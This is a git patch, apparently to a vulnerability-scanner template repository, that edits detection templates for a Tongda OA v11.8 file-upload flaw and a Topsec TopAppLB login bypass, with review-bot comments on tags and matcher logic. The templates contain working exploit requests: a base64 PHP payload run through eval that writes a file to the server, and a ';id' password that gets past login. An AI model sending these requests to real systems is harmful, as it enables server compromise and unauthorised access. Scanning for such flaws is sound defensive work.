From 33bf8b7cb2defdf9c0e9a50cc2d4fac4b0ff99df Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Fri, 8 Sep 2023 19:19:09 +0530
Subject: [PATCH] Updated

---
 ... => tongda-api-arbitrary-file-upload.yaml} | 24 ++++++++++---------
 ...l => topsec-topapplb-arbitrary-login.yaml} | 19 ++++++++-------
 2 files changed, 24 insertions(+), 19 deletions(-)
 rename http/vulnerabilities/tongda/{tongda-oa-api-ali-arbitrary-file-upload.yaml => tongda-api-arbitrary-file-upload.yaml} (58%)
 rename http/vulnerabilities/topsec/{topsec-topapplb-arbitrary-user-login.yaml => topsec-topapplb-arbitrary-login.yaml} (60%)

diff --git a/http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml b/http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml
similarity index 58%
rename from http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml
rename to http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml
index 4b82e671d1..961a11bf82 100755
--- a/http/vulnerabilities/tongda/tongda-oa-api-ali-arbitrary-file-upload.yaml
+++ b/http/vulnerabilities/tongda/tongda-api-arbitrary-file-upload.yaml
@@ -1,12 +1,17 @@
-id: tongda-oa-api-ali-arbitrary-file-upload
+id: tongda-api-arbitrary-file-upload
 
 info:
-  name: tongda-oa-api-ali-arbitrary-file-upload
+  name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload
   author: SleepingBag945
   severity: critical
-  description: 通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器
+  description: |
+    Tongda OA v11.8 api.ali.php has an arbitrary file upload vulnerability. An attacker can upload malicious files to control the server through the vulnerability.
   reference:
-    - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20api.ali.php%20任意文件上传漏洞.html
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml
+  metadata:
+    max-request: 1
+    fofa-query: app="TDXK-通达OA"
+    verified: true
   tags: tongda,oa
 
 http:
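Review bot: `max-request: 1` in the new metadata block understates the request count; the matchers later in this file reference `status_code_1`, `status_code_2` and `status_code_3`, so the template issues three requests and the value should be `max-request: 3`. The check also creates a file on the scanned host and fetches it back rather than only observing a response, so the tags line in this hunk should carry the repository's `intrusive` tag (`tags: tongda,oa,intrusive`) so operators who exclude intrusive templates skip it. The `verified: true` flag presumably records a live confirmation of the renamed template; if that was not redone after the `{{randstr}}` change in the following hunks, it should not be asserted yet.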
@@ -18,7 +23,7 @@ http:
         Accept-Encoding: gzip
 
         --502f67681799b07e5de6b503655f5cae
-        Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}.json"
         Content-Type: application/octet-stream
 
         {"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{"a":"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*"}"}
@@ -30,16 +35,13 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
       - |
-        GET /fb6790f4.php HTTP/1.1
+        GET /{{randstr}}.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-
-    # req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - 'status_code_1 == 200'
-          - 'status_code_2 == 200 && contains(body_2,"OK")'
-          - 'status_code_3 == 200 && contains(body_3,"phpinfo")'
+          - 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'
+          - 'contains(body_2,"OK") && contains(body_3,"phpinfo")'
         condition: and
\ No newline at end of file
diff --git a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
similarity index 60%
rename from http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml
rename to http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
index 77604a295a..6c8589bc4d 100755
--- a/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-user-login.yaml
+++ b/http/vulnerabilities/topsec/topsec-topapplb-arbitrary-login.yaml
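Review bot: The third request now fetches `/{{randstr}}.php`, but the only place `{{randstr}}` enters on the upload side is the multipart `filename` in the previous hunk, while the request body that decides what the server actually stores is unchanged from the version whose fetch path was the fixed `/fb6790f4.php`; unless those two names are tied to the same value, `contains(body_3,"phpinfo")` can never hold and the template silently stops reporting vulnerable hosts. This needs a re-run against a known-affected instance before merge, and the fetch path and the stored name must refer to the same file. Collapsing the three per-request conditions into two combined DSL lines is behaviour-equivalent under `condition: and`, so the matcher refactor itself is fine; removing the stale `# req-condition: true` comment is also correct since the DSL already spans all three responses.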
@@ -1,12 +1,17 @@
-id: topsec-topapplb-arbitrary-user-login
+id: topsec-topapplb-arbitrary-login
 
 info:
-  name: Topsec TopAppLB Any account Login
+  name: Topsec TopAppLB Any account Login - Arbitrary Login
   author: SleepingBag945
-  severity: critical
+  severity: high
   description: |
-    Any Account can log in to the background
-  tags: defaultaccount
+    Any Account can log in to the background.Enter any account on the login page, the password is ;id
+  reference:
+    - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json
+  metadata:
+    max-request: 1
+    fofa-query: title="TopApp-LB 负载均衡系统"
+  tags: topsec,topapplb,misconfig
 
 http:
   - raw:
@@ -14,7 +19,6 @@ http:
         POST /login_check.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4251.0 Safari/537.36
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
         Sec-Fetch-Site: same-origin
         Sec-Fetch-Mode: navigate
@@ -25,9 +29,8 @@ http:
         userName=admin&password=%3Bid
 
 
-
     matchers:
       - type: dsl
         dsl:
           - 'status_code_1 == 302 && contains(header_1,"redirect.php")'
-        condition: and
+        condition: and
\ No newline at end of file
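Review bot: The new `description` runs two sentences together ("background.Enter") and is hard to read; `Any account can log in to the backend. Supplying any username with the password ;id on the login page is accepted.` says the same thing cleanly. The `name` now reads `Any account Login - Arbitrary Login`, which repeats itself; `Topsec TopAppLB - Arbitrary Login` follows the `<Product> - <Issue>` form used for the Tongda template in the same commit. The replacement tag `misconfig` looks like a guess: a fixed password value bypassing the check (`password=%3Bid` in the last hunk) reads more like an authentication bypass than a misconfiguration, so `auth-bypass` may be the better tag — worth confirming against the referenced PoC. The severity drop from critical to high is not explained anywhere in the commit; a one-line rationale in the description or PR text would help later reviewers.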